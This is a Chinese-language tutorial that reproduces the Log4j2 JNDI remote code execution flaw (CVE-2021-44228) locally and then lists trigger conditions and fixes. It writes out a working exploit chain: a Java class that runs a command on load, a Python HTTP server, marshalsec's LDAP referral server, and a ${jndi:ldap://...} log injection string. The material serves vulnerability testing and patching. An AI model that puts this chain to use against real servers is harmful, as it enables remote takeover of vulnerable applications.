检查你的项目有没有Apache Log4j2 RCE漏洞

简介

三步快速检测你的项目有没有Apache Log4j2 RCE漏洞。

漏洞原因

在使用org/apache/logging/log4j/spi/AbstractLogger.java log记录日志时,且log等级为执行等级就能触发。原因是log字符串中检测到${},就会解析其中的字符串尝试使用lookup查询,因此只要注入log参数内容,就有机会实现漏洞利用。


  1. 准备要远程执行的恶意代码,命名Log4jRCE.java,用javac编译成class文件:

public class Log4jRCE {

   static {

       try {

           String [] cmd={"calc"};

           java.lang.Runtime.getRuntime().exec(cmd).waitFor();

       }catch (Exception e){

           e.printStackTrace();

       }

   }

}


  1. 在当前目录启动cmd,用python启动一个HTTPServer 服务,python -m http.server 8888,检测一下服务状态 http://127.0.0.1:8888/

检查你的项目有没有Apache Log4j2 RCE漏洞

  1. 开启JNDI LDAPRefServer:

git clone https://github.com/mbechler/marshalsec.git

cd marshalsec

# Java 8 required

mvn clean package -DskipTests

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"

检查你的项目有没有Apache Log4j2 RCE漏洞


在你的项目main方法里添加代码:

org.apache.logging.log4j.Logger logger = org.apache.logging.log4j.LogManager.getLogger(Demo.class);

logger.error("${jndi:ldap://127.0.0.1:1389/#Log4jRCE}");

检查你的项目有没有Apache Log4j2 RCE漏洞

执行远程代码成功,打开了本地的计算器程序。漏洞复现成功。


触发条件

  1. JDK版本11.0.1、8u191、7u201、6u211以下版本。其它版本需要增加代码System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
  2. 系统有可注入入口,比如后端拿到前端传来的字符串,打印了开启日志等级的日志。
  3. 系统使用log4j-api,log4j-core 2.14.1及以下版本



   org.apache.logging.log4j
   log4j-api
   2.14.1



   org.apache.logging.log4j
   log4j-core
   2.14.1


建议修复

  • JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true log4j2.formatMsgNoLookups=True
  • 升级log4j版本2.14.1以上
  • 升级jdk版本


参考链接

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce/issues/5

上一篇:[Map 3D开发实战系列] Map Resource Explorer 之七-- 查看资源内容及资源引用


下一篇:Apache Log4j爆“核弹级“漏洞,对众多java应用平台造成影响,已发现近万次攻击